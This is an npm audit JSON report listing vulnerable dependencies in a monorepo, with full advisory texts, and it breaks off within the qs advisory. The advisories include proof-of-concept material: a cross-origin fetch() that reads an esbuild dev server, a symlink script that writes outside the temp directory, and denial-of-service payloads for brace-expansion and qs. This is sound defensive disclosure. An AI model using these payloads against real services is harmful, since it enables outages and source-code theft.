audit.json

{
  "actions": [
    {
      "action": "update",
      "resolves": [
        {
          "id": 1112954,
          "path": ".>minimatch>@isaacs/brace-expansion",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ],
      "module": "@isaacs/brace-expansion",
      "target": "5.0.1",
      "depth": 3
    },
    {
      "action": "update",
      "resolves": [
        {
          "id": 1113161,
          "path": "sites__mainweb>stripe>qs",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ],
      "module": "qs",
      "target": "6.15.0",
      "depth": 3
    },
    {
      "action": "update",
      "resolves": [
        {
          "id": 1113428,
          "path": "packages__ui>eslint>ajv",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ],
      "module": "ajv",
      "target": "6.14.0",
      "depth": 3
    },
    {
      "action": "update",
      "resolves": [
        {
          "id": 1113515,
          "path": "packages__api>vitest>vite>rollup",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ],
      "module": "rollup",
      "target": "4.59.0",
      "depth": 4
    },
    {
      "action": "update",
      "resolves": [
        {
          "id": 1113518,
          "path": ".>@turbo/gen>proxy-agent>pac-proxy-agent>get-uri>basic-ftp",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ],
      "module": "basic-ftp",
      "target": "5.2.0",
      "depth": 6
    },
    {
      "action": "review",
      "module": "esbuild",
      "resolves": [
        {
          "id": 1102341,
          "path": "packages__db>drizzle-kit>@esbuild-kit/esm-loader>@esbuild-kit/core-utils>esbuild",
          "dev": false,
          "optional": false,
          "bundled": false
        },
        {
          "id": 1102341,
          "path": "packages__db>drizzle-kit>esbuild",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ]
    },
    {
      "action": "review",
      "module": "xlsx",
      "resolves": [
        {
          "id": 1108110,
          "path": "packages__db>xlsx",
          "dev": false,
          "bundled": false,
          "optional": false
        },
        {
          "id": 1108111,
          "path": "packages__db>xlsx",
          "dev": false,
          "bundled": false,
          "optional": false
        }
      ]
    },
    {
      "action": "review",
      "module": "tmp",
      "resolves": [
        {
          "id": 1109537,
          "path": ".>@turbo/gen>inquirer>external-editor>tmp",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ]
    },
    {
      "action": "review",
      "module": "next",
      "resolves": [
        {
          "id": 1112592,
          "path": ".>next",
          "dev": false,
          "optional": false,
          "bundled": false
        },
        {
          "id": 1112645,
          "path": ".>next",
          "dev": false,
          "optional": false,
          "bundled": false
        },
        {
          "id": 1112990,
          "path": ".>next",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ]
    },
    {
      "action": "review",
      "module": "js-yaml",
      "resolves": [
        {
          "id": 1112715,
          "path": ".>@turbo/gen>@turbo/workspaces>js-yaml",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ]
    },
    {
      "action": "review",
      "module": "minimatch",
      "resolves": [
        {
          "id": 1113459,
          "path": ".>@turbo/gen>node-plop>del>rimraf>glob>minimatch",
          "dev": false,
          "optional": false,
          "bundled": false
        },
        {
          "id": 1113465,
          "path": ".>@turbo/gen>minimatch",
          "dev": false,
          "optional": false,
          "bundled": false
        },
        {
          "id": 1113465,
          "path": "sites__mainweb>typescript-eslint>@typescript-eslint/typescript-estree>minimatch",
          "dev": false,
          "optional": false,
          "bundled": false
        },
        {
          "id": 1113466,
          "path": ".>minimatch",
          "dev": false,
          "optional": false,
          "bundled": false
        }
      ]
    }
  ],
  "advisories": {
    "1102341": {
      "findings": [
        {
          "version": "0.18.20",
          "paths": [
            "packages__db>drizzle-kit>@esbuild-kit/esm-loader>@esbuild-kit/core-utils>esbuild"
          ]
        },
        {
          "version": "0.19.12",
          "paths": [
            "packages__db>drizzle-kit>esbuild"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99\n- https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d\n- https://github.com/advisories/GHSA-67mh-4wv8-2f99",
      "created": "2025-02-10T17:48:07.000Z",
      "id": 1102341,
      "npm_advisory_id": null,
      "overview": "### Summary\n\nesbuild allows any websites to send any request to the development server and read the response due to default CORS settings.\n\n### Details\n\nesbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.\n\nhttps://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121\nhttps://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363\n\n**Attack scenario**:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n1. The user accesses the malicious web page.\n1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.\n\nIn this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by\n\n- Fetching `/index.html`: normally you have a script tag here\n- Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files\n- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`)\n- Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file\n\nThe scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.\n\n### PoC\n\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18561484/reproduction.zip)\n2. Extract it and move to that directory\n1. Run `npm i`\n1. Run `npm run watch`\n1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.\n\n![image](https://github.com/user-attachments/assets/08fc2e4d-e1ec-44ca-b0ea-78a73c3c40e9)\n\n### Impact\n\nUsers using the serve feature may get the source code stolen by malicious websites.",
      "reported_by": null,
      "title": "esbuild enables any website to send any requests to the development server and read the response",
      "metadata": null,
      "cves": [],
      "access": "public",
      "severity": "moderate",
      "module_name": "esbuild",
      "vulnerable_versions": "<=0.24.2",
      "github_advisory_id": "GHSA-67mh-4wv8-2f99",
      "recommendation": "Upgrade to version 0.25.0 or later",
      "patched_versions": ">=0.25.0",
      "updated": "2025-02-10T17:48:08.000Z",
      "cvss": {
        "score": 5.3,
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
      },
      "cwe": [
        "CWE-346"
      ],
      "url": "https://github.com/advisories/GHSA-67mh-4wv8-2f99"
    },
    "1108110": {
      "findings": [
        {
          "version": "0.18.5",
          "paths": [
            "packages__db>xlsx"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://nvd.nist.gov/vuln/detail/CVE-2023-30533\n- https://cdn.sheetjs.com/advisories/CVE-2023-30533\n- https://git.sheetjs.com/sheetjs/sheetjs/src/branch/master/CHANGELOG.md\n- https://git.sheetjs.com/sheetjs/sheetjs/issues/2667\n- https://git.sheetjs.com/sheetjs/sheetjs/issues/2986\n- https://cdn.sheetjs.com\n- https://github.com/advisories/GHSA-4r6h-8v6p-xvw6",
      "created": "2023-04-24T09:30:19.000Z",
      "id": 1108110,
      "npm_advisory_id": null,
      "overview": "All versions of SheetJS CE through 0.19.2 are vulnerable to \"Prototype Pollution\" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.\n\nA non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package `xlsx` are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.",
      "reported_by": null,
      "title": "Prototype Pollution in sheetJS",
      "metadata": null,
      "cves": [
        "CVE-2023-30533"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "xlsx",
      "vulnerable_versions": "<0.19.3",
      "github_advisory_id": "GHSA-4r6h-8v6p-xvw6",
      "recommendation": "None",
      "patched_versions": "<0.0.0",
      "updated": "2025-09-19T15:23:41.000Z",
      "cvss": {
        "score": 7.8,
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
      },
      "cwe": [
        "CWE-1321"
      ],
      "url": "https://github.com/advisories/GHSA-4r6h-8v6p-xvw6"
    },
    "1108111": {
      "findings": [
        {
          "version": "0.18.5",
          "paths": [
            "packages__db>xlsx"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://nvd.nist.gov/vuln/detail/CVE-2024-22363\n- https://cdn.sheetjs.com/advisories/CVE-2024-22363\n- https://cwe.mitre.org/data/definitions/1333.html\n- https://git.sheetjs.com/sheetjs/sheetjs/src/tag/v0.20.2\n- https://cdn.sheetjs.com\n- https://github.com/advisories/GHSA-5pgg-2g8v-p4x9",
      "created": "2024-04-05T06:30:46.000Z",
      "id": 1108111,
      "npm_advisory_id": null,
      "overview": "SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).\n\nA non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package `xlsx` are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.",
      "reported_by": null,
      "title": "SheetJS Regular Expression Denial of Service (ReDoS)",
      "metadata": null,
      "cves": [
        "CVE-2024-22363"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "xlsx",
      "vulnerable_versions": "<0.20.2",
      "github_advisory_id": "GHSA-5pgg-2g8v-p4x9",
      "recommendation": "None",
      "patched_versions": "<0.0.0",
      "updated": "2025-09-19T15:23:26.000Z",
      "cvss": {
        "score": 7.5,
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
      },
      "cwe": [
        "CWE-1333"
      ],
      "url": "https://github.com/advisories/GHSA-5pgg-2g8v-p4x9"
    },
    "1109537": {
      "findings": [
        {
          "version": "0.0.33",
          "paths": [
            ".>@turbo/gen>inquirer>external-editor>tmp"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\n- https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\n- https://nvd.nist.gov/vuln/detail/CVE-2025-54798\n- https://github.com/raszi/node-tmp/issues/207\n- https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html\n- https://github.com/advisories/GHSA-52f5-9888-hmc6",
      "created": "2025-08-06T17:06:04.000Z",
      "id": 1109537,
      "npm_advisory_id": null,
      "overview": "### Summary\n\n`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.\n\n\n### Details\n\nAccording to the documentation there are some conditions that must be held:\n\n```\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50\n\nOther breaking changes, i.e.\n\n- template must be relative to tmpdir\n- name must be relative to tmpdir\n- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks\n\nare still in place.\n\nIn order to override the system's tmpdir, you will have to use the newly\nintroduced tmpdir option.\n\n\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375\n* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.\n     absolute paths are fine as long as they point to a location under the system's default temporary directory.\n     Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, \n     as tmp will not check the availability of the path, nor will it establish the requested path for you.\n```\n\nRelated issue: https://github.com/raszi/node-tmp/issues/207.\n\n\nThe issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579\nfunction _resolvePath(name, tmpDir) {\n  if (name.startsWith(tmpDir)) {\n    return path.resolve(name);\n  } else {\n    return path.resolve(path.join(tmpDir, name));\n  }\n}\n```\n\nIf the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609\nfunction _assertIsRelative(name, option, tmpDir) {\n  if (option === 'name') {\n    // assert that name is not absolute and does not contain a path\n    if (path.isAbsolute(name))\n      throw new Error(`${option} option must not contain an absolute path, found \"${name}\".`);\n    // must not fail on valid .<name> or ..<name> or similar such constructs\n    let basename = path.basename(name);\n    if (basename === '..' || basename === '.' || basename !== name)\n      throw new Error(`${option} option must not contain a path, found \"${name}\".`);\n  }\n  else { // if (option === 'dir' || option === 'template') {\n    // assert that dir or template are relative to tmpDir\n    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {\n      throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${name}\".`);\n    }\n    let resolvedPath = _resolvePath(name, tmpDir); //<--- \n    if (!resolvedPath.startsWith(tmpDir))\n      throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${resolvedPath}\".`);\n  }\n}\n```\n\n\n### PoC\n\nThe following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.\nTested on a Linux machine.\n\n- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it\n```bash\nmkdir $HOME/mydir1\n\nln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir\n```\n\n- check the folder is empty:\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n```\n\n- run the poc\n```bash\nnode main.js\nFile:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf\ntest 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'\ntest 2: dir option must be relative to \"/tmp\", found \"/foo\".\ntest 3: dir option must be relative to \"/tmp\", found \"/home/user/mydir1\".\n```\n\n- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n-rw------- 1 user user    0 Apr  X XX:XX tmp-[random-id]\n```\n\n\n- `main.js`\n```js\n// npm i tmp@0.2.3\n\nconst tmp = require('tmp');\n\nconst tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});\nconsole.log('File: ', tmpobj.name);\n\ntry {\n    tmp.fileSync({ 'dir': 'mydir1'});\n} catch (err) {\n    console.log('test 1:', err.message)\n}\n\ntry {\n    tmp.fileSync({ 'dir': '/foo'});\n} catch (err) {\n    console.log('test 2:', err.message)\n}\n\ntry {\n    const fs = require('node:fs');\n    const resolved = fs.realpathSync('/tmp/evil-dir');\n    tmp.fileSync({ 'dir': resolved});\n} catch (err) {\n    console.log('test 3:', err.message)\n}\n```\n\n\nA Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.\n```js\nfunction _resolvePath(name, tmpDir) {\n  let resolvedPath;\n  if (name.startsWith(tmpDir)) {\n    resolvedPath = path.resolve(name);\n  } else {\n    resolvedPath = path.resolve(path.join(tmpDir, name));\n  }\n  return fs.realpathSync(resolvedPath);\n}\n```\n\n\n### Impact\n\nArbitrary temporary file / directory write via symlink",
      "reported_by": null,
      "title": "tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter",
      "metadata": null,
      "cves": [
        "CVE-2025-54798"
      ],
      "access": "public",
      "severity": "low",
      "module_name": "tmp",
      "vulnerable_versions": "<=0.2.3",
      "github_advisory_id": "GHSA-52f5-9888-hmc6",
      "recommendation": "Upgrade to version 0.2.4 or later",
      "patched_versions": ">=0.2.4",
      "updated": "2025-11-03T21:34:21.000Z",
      "cvss": {
        "score": 2.5,
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
      },
      "cwe": [
        "CWE-59"
      ],
      "url": "https://github.com/advisories/GHSA-52f5-9888-hmc6"
    },
    "1112592": {
      "findings": [
        {
          "version": "16.1.4",
          "paths": [
            ".>next"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f\n- https://nvd.nist.gov/vuln/detail/CVE-2025-59471\n- https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c\n- https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec\n- https://github.com/vercel/next.js/releases/tag/v15.5.10\n- https://github.com/vercel/next.js/releases/tag/v16.1.5\n- https://github.com/advisories/GHSA-9g9p-9gw9-jx7f",
      "created": "2026-01-27T19:18:25.000Z",
      "id": 1112592,
      "npm_advisory_id": null,
      "overview": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
      "reported_by": null,
      "title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
      "metadata": null,
      "cves": [
        "CVE-2025-59471"
      ],
      "access": "public",
      "severity": "moderate",
      "module_name": "next",
      "vulnerable_versions": ">=15.6.0-canary.0 <16.1.5",
      "github_advisory_id": "GHSA-9g9p-9gw9-jx7f",
      "recommendation": "Upgrade to version 16.1.5 or later",
      "patched_versions": ">=16.1.5",
      "updated": "2026-01-27T19:18:28.000Z",
      "cvss": {
        "score": 5.9,
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
      },
      "cwe": [
        "CWE-400",
        "CWE-770"
      ],
      "url": "https://github.com/advisories/GHSA-9g9p-9gw9-jx7f"
    },
    "1112645": {
      "findings": [
        {
          "version": "16.1.4",
          "paths": [
            ".>next"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg\n- https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf\n- https://nvd.nist.gov/vuln/detail/CVE-2026-23864\n- https://vercel.com/changelog/summary-of-cve-2026-23864\n- https://github.com/advisories/GHSA-h25m-26qc-wcjf",
      "created": "2026-01-28T15:38:01.000Z",
      "id": 1112645,
      "npm_advisory_id": null,
      "overview": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
      "reported_by": null,
      "title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
      "metadata": null,
      "cves": [],
      "access": "public",
      "severity": "high",
      "module_name": "next",
      "vulnerable_versions": ">=16.1.0-canary.0 <16.1.5",
      "github_advisory_id": "GHSA-h25m-26qc-wcjf",
      "recommendation": "Upgrade to version 16.1.5 or later",
      "patched_versions": ">=16.1.5",
      "updated": "2026-01-28T15:38:02.000Z",
      "cvss": {
        "score": 7.5,
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
      },
      "cwe": [
        "CWE-400",
        "CWE-502"
      ],
      "url": "https://github.com/advisories/GHSA-h25m-26qc-wcjf"
    },
    "1112715": {
      "findings": [
        {
          "version": "4.1.0",
          "paths": [
            ".>@turbo/gen>@turbo/workspaces>js-yaml"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m\n- https://nvd.nist.gov/vuln/detail/CVE-2025-64718\n- https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\n- https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\n- https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876\n- https://github.com/advisories/GHSA-mh29-5h37-fv8m",
      "created": "2025-11-14T14:29:48.000Z",
      "id": 1112715,
      "npm_advisory_id": null,
      "overview": "### Impact\n\nIn js-yaml 4.1.0, 4.0.0, and 3.14.1 and below, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted.\n\n### Patches\n\nProblem is patched in js-yaml 4.1.1 and 3.14.2.\n\n### Workarounds\n\nYou can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).\n\n### References\n\nhttps://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html",
      "reported_by": null,
      "title": "js-yaml has prototype pollution in merge (<<)",
      "metadata": null,
      "cves": [
        "CVE-2025-64718"
      ],
      "access": "public",
      "severity": "moderate",
      "module_name": "js-yaml",
      "vulnerable_versions": ">=4.0.0 <4.1.1",
      "github_advisory_id": "GHSA-mh29-5h37-fv8m",
      "recommendation": "Upgrade to version 4.1.1 or later",
      "patched_versions": ">=4.1.1",
      "updated": "2026-01-31T03:32:45.000Z",
      "cvss": {
        "score": 5.3,
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
      },
      "cwe": [
        "CWE-1321"
      ],
      "url": "https://github.com/advisories/GHSA-mh29-5h37-fv8m"
    },
    "1112954": {
      "findings": [
        {
          "version": "5.0.0",
          "paths": [
            ".>minimatch>@isaacs/brace-expansion"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25547\n- https://github.com/advisories/GHSA-7h2j-956f-4vf2",
      "created": "2026-02-03T19:41:15.000Z",
      "id": 1112954,
      "npm_advisory_id": null,
      "overview": "### Summary\n\n`@isaacs/brace-expansion` is vulnerable to a Denial of Service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process.\n\n### Details\n\nThe vulnerability occurs because `@isaacs/brace-expansion` expands brace expressions without any upper bound or complexity limit. Expansion is performed eagerly and synchronously, meaning the full result set is generated before returning control to the caller.\n\nFor example, the following input:\n\n```\n{0..99}{0..99}{0..99}{0..99}{0..99}\n```\n\nproduces:\n\n```\n100^5 = 10,000,000,000 combinations\n```\n\nThis exponential growth can quickly overwhelm the event loop and heap memory, resulting in process termination.\n\n### Proof of Concept\n\nThe following script reliably triggers the issue.\n\nCreate `poc.js`:\n\n```js\nconst { expand } = require('@isaacs/brace-expansion');\n\nconst pattern = '{0..99}{0..99}{0..99}{0..99}{0..99}';\n\nconsole.log('Starting expansion...');\nexpand(pattern);\n```\n\nRun it:\n\n```bash\nnode poc.js\n```\n\nThe process will freeze and typically crash with an error such as:\n\n```\nFATAL ERROR: JavaScript heap out of memory\n```\n\n### Impact\n\nThis is a denial of service vulnerability. Any application or downstream dependency that uses `@isaacs/brace-expansion` on untrusted input may be vulnerable to a single-request crash.\n\nAn attacker does not require authentication and can use a very small payload to:\n\n* Trigger exponential computation\n* Exhaust memory and CPU resources\n* Block the event loop\n* Crash Node.js services relying on this library",
      "reported_by": null,
      "title": "@isaacs/brace-expansion has Uncontrolled Resource Consumption",
      "metadata": null,
      "cves": [
        "CVE-2026-25547"
      ],
      "access": "public",
      "severity": "high",
      "module_name": "@isaacs/brace-expansion",
      "vulnerable_versions": "<=5.0.0",
      "github_advisory_id": "GHSA-7h2j-956f-4vf2",
      "recommendation": "Upgrade to version 5.0.1 or later",
      "patched_versions": ">=5.0.1",
      "updated": "2026-02-05T00:36:55.000Z",
      "cvss": {
        "score": 0,
        "vectorString": null
      },
      "cwe": [
        "CWE-1333"
      ],
      "url": "https://github.com/advisories/GHSA-7h2j-956f-4vf2"
    },
    "1112990": {
      "findings": [
        {
          "version": "16.1.4",
          "paths": [
            ".>next"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h\n- https://nvd.nist.gov/vuln/detail/CVE-2025-59472\n- https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472\n- https://github.com/advisories/GHSA-5f7q-jpqc-wp7h",
      "created": "2026-01-28T15:20:55.000Z",
      "id": 1112990,
      "npm_advisory_id": null,
      "overview": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
      "reported_by": null,
      "title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
      "metadata": null,
      "cves": [
        "CVE-2025-59472"
      ],
      "access": "public",
      "severity": "moderate",
      "module_name": "next",
      "vulnerable_versions": ">=16.0.0-beta.0 <16.1.5",
      "github_advisory_id": "GHSA-5f7q-jpqc-wp7h",
      "recommendation": "Upgrade to version 16.1.5 or later",
      "patched_versions": ">=16.1.5",
      "updated": "2026-02-05T17:17:18.000Z",
      "cvss": {
        "score": 5.9,
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
      },
      "cwe": [
        "CWE-400",
        "CWE-409",
        "CWE-770"
      ],
      "url": "https://github.com/advisories/GHSA-5f7q-jpqc-wp7h"
    },
    "1113161": {
      "findings": [
        {
          "version": "6.14.1",
          "paths": [
            "sites__mainweb>stripe>qs"
          ]
        }
      ],
      "found_by": null,
      "deleted": null,
      "references": "- https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883\n- https://nvd.nist.gov/vuln/detail/CVE-2026-2391\n- https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\n- https://github.com/advisories/GHSA-w7fw-mjwx-w883",
      "created": "2026-02-12T17:04:39.000Z",
      "id": 1113161,
      "npm_advisory_id": null,
      "overview": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n    return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThe `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require('qs');\n\nconst payload = 'a=' + ','.repeat(25);  // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n  const result = qs.parse(payload, options);\n  console.log(result.a.length);  // Outputs: 26 (bypass successful)\n} catch (e) {\n  console.log('Limit enforced:', e.message);  // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.\n\n### Suggested Fix\nMove the `arrayLimit` check before the comma split in `parseArrayValue`, and enforce it on the resulting array length. Use `currentArrayLength` (already calculated upstream) for consistency with bracket notation fixes.\n\n**Current code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n    return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit 